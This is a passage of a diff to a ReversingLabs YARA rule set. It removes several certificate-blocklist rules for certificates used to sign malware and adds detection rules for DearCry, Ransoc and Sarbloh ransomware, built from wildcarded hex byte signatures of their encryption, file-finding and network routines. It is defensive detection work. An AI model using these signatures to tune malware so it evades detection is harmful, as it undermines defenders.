+            59 84 C0 74 ?? 84 DB 74 ?? FE CB 80 FB ?? 8B 5D ?? 0F 87 ?? ?? ?? ?? FF 75 ?? 8D 45
+            ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 E9 ?? ?? ?? ?? FF 75 ?? 8B 5D ?? 8D 45 ?? 53
+            56 50 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8B 4D ?? 8B 55 ?? 8B 04 8D ?? ?? ?? ?? 80 7C 10
+            ?? ?? 7D ?? 0F BE C3 8B 5D ?? 83 E8 ?? 74 ?? 83 E8 ?? 74 ?? 83 E8 ?? 75 ?? FF 75 ??
+            8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB
+            ?? FF 75 ?? 8D 45 ?? 53 56 50 E8 ?? ?? ?? ?? EB ?? 8B 4C 10 ?? 8D 7D ?? 8B 5D ?? 33
+            C0 AB 6A ?? AB AB 8D 45 ?? 50 FF 75 ?? 53 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 15 ??
+            ?? ?? ?? 89 45 ?? 8D 75 ?? 8D 7D ?? A5 A5 A5 8B 4D ?? 8B 55 ?? 8B 45 ?? 85 C0 75 ??
+            8B 45 ?? 85 C0 74 ?? 6A ?? 5E 3B C6 75 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 89 30 EB ?? 50 E8 ?? ?? ?? ?? 59 EB ?? 8B 04 8D ?? ?? ?? ?? F6 44 10 ?? ?? 74
+            ?? 80 3B ?? 75 ?? 33 C0 EB ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 20
+            ?? 83 C8 ?? EB ?? 2B 45 ?? 5F 5B 8B 4D ?? 33 CD 5E E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "WLE DESENVOLVIMENTO DE SOFTWARE E ASSESSORIA LTDA EPP" and ( pe.signatures [ i ] . serial == "00:86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" or pe.signatures [ i ] . serial == "86:41:96:f0:19:71:db:ec:70:02:b4:86:42:a7:01:3a" ) and 1384300799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $skip_hk_china_taiwan_p* ) ) and ( all of ( $find_files_* ) ) and ( $crypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_4Fda1E121B61Adeca936A6Aebe079303 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Dearcry : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DearCry ransomware."
 		author = "ReversingLabs"
-		id = "fba98d6b-dc09-5294-ad86-2f4e0d8ad320"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "6e2097e0-6495-5185-bbbc-e8168fa0ca7f"
+		date = "2021-03-12"
+		modified = "2021-03-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2432-L2448"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "70a04c83e79c98024bacf1688bb46d80c9b8491e25dd32d6d92bf3cf61c62e48"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.DearCry.yara#L1-L96"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "40dde232255018e1bc0aadf2378a7a86a99327d13dda58d8ffc5bb38e164de26"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DearCry"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$drop_ransom_note_p1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 53 56 57 33 DB 68 ?? ?? ?? ?? 50 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ??
+            ?? ?? 89 1D ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 89 1D ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 89 44 24 ?? E8
+            ?? ?? ?? ?? 8B F0 6A ?? 68 ?? ?? ?? ?? 89 74 24 ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ??
+            E8 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 3B F3 0F 84 ?? ?? ?? ?? 3B FB 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 5C 24 ?? B8 ?? ?? ?? ?? 33 F6 8B FF
+            38 18 74 ?? 50 E8 ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 83 C4 ?? 8B D7 8A 08 88 0A 40 42 84
+            C9 75 ?? 8B C7 33 F6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 74 ?? 0F BE 14 37 52 E8 ??
+            ?? ?? ?? 88 04 37 8B C7 83 C4 ?? 46 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F0 72 ??
+            8B 74 24 ?? 46 89 74 24 ?? 69 F6 ?? ?? ?? ?? 8D 86 ?? ?? ?? ?? 3B C3 75 ?? 6A ?? 68
+        }
+		$drop_ransom_note_p2 = {
+            89 5C 24 ?? E8 ?? ?? ?? ?? 53 8B F0 53 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 56 89 44 24
+            ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B F8 3B C3 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 53 51 88 5C 24 ?? E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 54 24 ?? 52 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
+            8A 44 1C ?? 3C ?? 7C ?? 3C ?? 7E ?? 3C ?? 0F 8C ?? ?? ?? ?? 3C ?? 0F 8F ?? ?? ?? ??
+            0F BE C0 50 8D 4C 24 ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 C4 ??
+            8D 54 24 ?? 52 FF D6 83 F8 ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D6 85 C0 74 ?? 8B
+            4C 24 ?? 8B 54 24 ?? 8B 44 24 ?? 51 52 50 6A ?? 8D 4C 24 ?? 51 57 E8 ?? ?? ?? ?? 0F
+            BE 54 1C ?? 68 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? B8 ?? ?? ?? ?? 8D 50
+            ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 56 2B C2 50 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56
+            E8 ?? ?? ?? ?? 83 C4 ?? 43 81 FB ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 33 DB 57
+        }
+		$find_files_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 31 45 ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64
+            A3 ?? ?? ?? ?? 89 65 ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 75 ?? 89 B5 ?? ?? ?? ?? 8B 4D
+            ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ?? ?? ?? ??
+            8B C6 8D 50 ?? 8D 49 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 8B C6 8D 50
+            ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 06 ?? ?? 74 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? 52 EB ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 6A
+            ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 85 DB 0F 84 ?? ?? ?? ?? 8B C6
+            8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 8B D0 8D 85 ?? ?? ?? ?? 8D 78 ?? 8A 08 40 84 C9
+            75 ?? 2B C7 03 C2 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 6A ?? 8D 4D ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B C3 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 83 F8 ?? 76 ?? B8 ?? ?? ??
+            ?? EB ?? 8B C3 8D 50 ?? 8D 64 24 ?? 8A 08 40 84 C9 75 ?? 2B C2 50 53 8D 55 ?? 52 E8
+        }
+		$find_files_p2 = {
+            83 C4 ?? 33 FF 8D 45 ?? 8D 50 ?? 90 8A 08 40 84 C9 75 ?? 2B C2 74 ?? EB ?? 8D 49 ??
+            0F BE 44 3D ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 88 44 3D ?? 47 8D 45 ?? 8D 50 ?? 8D A4 24
+            ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B C2 3B F8 72 ?? 8D 4D ?? 51 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8A 10 3A
+            11 75 ?? 84 D2 74 ?? 8A 50 ?? 3A 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 84 D2 75 ?? 33 C0 EB
+            ?? 1B C0 83 D8 ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75 ?? 2B
+            C2 80 7C 30 ?? ?? 74 ?? 8B C6 8D 50 ?? 8A 08 40 84 C9 75 ?? 2B C2 80 7C 30 ?? ?? 74
+            ?? 8D 85 ?? ?? ?? ?? 50 56 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 EB ?? 8D 95 ?? ?? ??
+            ?? 52 56 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 8B BD ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 68 ?? ?? ?? ?? 6A ?? 8B 9D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 53 57 8B 55 ??
+            52 8D BD ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ??
+            E9 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 65 ?? C7 45 ?? ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? E9
+            ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B C6 8D 50 ?? 8B FF
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Laizhou wanlei stone Co., LTD" and pe.signatures [ i ] . serial == "4f:da:1e:12:1b:61:ad:ec:a9:36:a6:ae:be:07:93:03" and 1310687999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $drop_ransom_note_p* ) ) and ( all of ( $find_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_03866Deb183Abfbf4Ff458D4De7Bd73A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Ransoc : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Ransoc ransomware."
 		author = "ReversingLabs"
-		id = "2641eb86-94f0-537c-a82a-6a5e1596ee84"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "a990754e-eafa-5501-a123-bcbd5aa26ca6"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2450-L2466"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "90d09d0d2d01500e0670277d0e8de574feecf7443cf4d077912b1166a9c14c43"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Ransoc.yara#L1-L114"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1f48f1b713c18b099e863d8a11e872ae84df0ea355f01cba765e8333d8d98575"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Ransoc"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$scan_for_services = {
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66 89
+            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3
+            E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85
+            C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73
+            ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 66 A3 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? B9 ?? ?? ?? ?? 66
+            89 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ?? ?? ?? 73 ?? 66 01 1D ?? ?? ?? ?? 03
+            F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 FF 66 39 2D ?? ??
+            ?? ?? 73 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 66 01 1D ?? ?? ?? ?? 8B
+            FB 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 39 2D ?? ??
+            ?? ?? 73 ?? 85 FF 75 ?? A1 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 66
+            01 1D ?? ?? ?? ?? 03 F3 E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? BA ?? ?? ?? ?? 66 89 15 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            EB ?? 85 FF 74 ?? 8D 44 24 ?? 50 E8
+      }
+		$remote_connection = {
+            8B 44 24 ?? 83 EC ?? 53 8B 5C 24 ?? 56 8B 74 24 ?? 50 56 E8 ?? ?? ?? ?? 8B D8 83 C4
+            ?? 83 FB ?? 75 ?? 5E B8 ?? ?? ?? ?? 5B 83 C4 ?? C3 8B 4C 24 ?? 55 8B 6C 24 ?? 57 55
+            56 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 56 FF 15 ?? ?? ?? ?? 50 56 53 E8
+            ?? ?? ?? ?? 56 8B F8 E8 ?? ?? ?? ?? 83 C4 ?? 83 FF ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8D
+            47 ?? 5F 5D 5E 5B 83 C4 ?? C3 8B 44 24 ?? 85 C0 74 ?? 85 ED 74 ?? 55 50 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 83 F8 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B 83 C4
+            ?? C3 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 8B 2D ?? ?? ?? ?? 83 C4 ?? 8D 49 ?? 8B 74 24 ??
+            8B C6 2B 44 24 ?? 75 ?? 8D 4C 24 ?? 6A ?? 51 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? 2B
+            74 24 ?? 6A ?? 56 8D 54 24 ?? 56 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 53 FF D5 8B F8 85 FF
+            78 ?? 2B C6 01 44 24 ?? EB ?? 29 74 24 ?? 83 FF ?? 74 ?? 85 FF 75 ?? 53 FF 15 ?? ??
+            ?? ?? 85 FF 79 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D 5E B8 ?? ?? ?? ?? 5B
+            83 C4 ?? C3 8D 54 24 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 68 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 5F 5D
+            8D 46 ?? 5E 5B 83 C4 ?? C3 8B 54 24 ?? 83 C2 ?? 6A ?? 52 E8 ?? ?? ?? ?? 8B 4C 24 ??
+            8B 54 24 ?? 8B F8 8B 44 24 ?? 2B F0 83 C6 ?? 2B CE 51 03 F0 56 52 E8 ?? ?? ?? ?? 8D
+            44 24 ?? 50 E8
+      }
+		$encrypt_files = {
+            81 EC ?? ?? ?? ?? 53 55 56 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 68 ?? ?? ?? ??
+            8B F8 FF D6 8B 8C 24 ?? ?? ?? ?? 8B E8 8B 84 24 ?? ?? ?? ?? 50 51 57 8D 94 24 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 8B BC 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 83 C4 ?? 89 4C 24 ?? BB ??
+            ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? EB ?? 8D 49 ?? 55 68 ?? ?? ?? ?? 83 FB ?? 7E ?? 8D
+            94 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 74 24 ?? 8D BC 24 ?? ?? ?? ?? 52 F3 A5 E8 ?? ??
+            ?? ?? 8B BC 24 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? EB ?? 8D 84 24 ?? ?? ?? ??
+            50 E8 ?? ?? ?? ?? 88 9C 2C ?? ?? ?? ?? 8D 75 ?? 83 C4 ?? 6A ?? 8D 4C 24 ?? 6A ?? 51
+            E8 ?? ?? ?? ?? 6A ?? 8D 94 24 ?? ?? ?? ?? 52 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 44 24 ?? B9 ?? ?? ?? ?? 80 30 ?? 40 49 75 ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 6A ??
+            8D 54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 51 8D
+            94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 51 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 44 24 ?? B9 ?? ?? ?? ?? 8B FF 80 30 ?? 40 49 75 ?? 8D 54 24 ?? 52
+            E8 ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 6A ?? 8D
+            54 24 ?? 52 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 51 8D 54 24
+            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 83 FF ?? 72 ?? BE ?? ?? ?? ?? 8B 4C 24 ?? 56 8D
+            44 24 ?? 50 51 E8 ?? ?? ?? ?? 01 74 24 ?? 2B FE 83 C4 ?? 43 89 BC 24 ?? ?? ?? ?? 85
+            FF 0F 85 ?? ?? ?? ?? 5F 5E 5D 5B 81 C4 ?? ?? ?? ?? C3
+      }
+		$find_files = {
+            83 EC ?? 53 55 56 57 33 DB 68 ?? ?? ?? ?? 6A ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ??
+            ?? 8B E8 8D 44 24 ?? 50 89 6C 24 ?? E8 ?? ?? ?? ?? 8D 4C 24 ?? 55 51 E8 ?? ?? ?? ??
+            8B 74 24 ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 55 68 ?? ?? ??
+            ?? 89 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B F8 57 8D 54 24 ?? 52 8D 44 24 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 44 24 ?? 3B C3 75 ?? 8B 4C 24 ?? 51 8D 54 24 ?? 52 E8 ?? ??
+            ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? 6A ?? 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ??
+            ?? ?? 8B 44 24 ?? 50 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 4C 24 ??
+            51 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 33 FF 39 5C 24 ?? 76 ?? 8D 64 24 ?? 8B 44 24 ?? 8B 0C B8 51 56 E8 ?? ??
+            ?? ?? 47 83 C4 ?? 3B 7C 24 ?? 72 ?? 39 5C 24 ?? 75 ?? 8B 44 24 ?? 3B C3 74 ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 8B 54 24 ?? 52 56 E8 ?? ?? ??
+            ?? 8B 44 24 ?? 83 C4 ?? 89 5C 24 ?? 3B C3 0F 86 ?? ?? ?? ?? EB ?? 8D 9B ?? ?? ?? ??
+            8B 44 24 ?? 8B 4C 24 ?? 8B 1C 88 53 55 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 57 68 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? 8B E8 E8 ?? ?? ?? ?? 6A ?? 56 89 44 24 ??
+            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 53 56 E8 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            56 E8 ?? ?? ?? ?? 33 C0 8D 54 24 ?? 55 52 C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 84
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84
+            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 8D 44 24 ?? 50 56
+            E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ??
+            ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B D3 52 E8 ?? ??
+            ?? ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 6C 24 ?? 41 83 C4 ?? 89 4C 24 ?? 3B C8 0F 82 ?? ??
+            ?? ?? 33 DB 33 F6 3B C3 76 ?? 8B 44 24 ?? 8B 0C B0 51 E8 ?? ?? ?? ?? 46 83 C4 ?? 3B
+            74 24 ?? 72 ?? 8D 54 24 ?? 52 E8 ?? ?? ?? ?? 55 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ??
+            3B C3 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 44 24 ?? 5F 5E 5D 3B C3 5B 74 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 83 C4 ?? C3
+      }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE9\\x87\\x8D\\xE5\\xBA\\x86\\xE8\\xAF\\x9D\\xE8\\xAF\\xAD\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "03:86:6d:eb:18:3a:bf:bf:4f:f4:58:d4:de:7b:d7:3a" and 1371772799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $scan_for_services and $find_files and $encrypt_files and $remote_connection
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1Be41B34127Ca9E6270830D2070Db426 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Sarbloh : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Sarbloh ransomware."
 		author = "ReversingLabs"
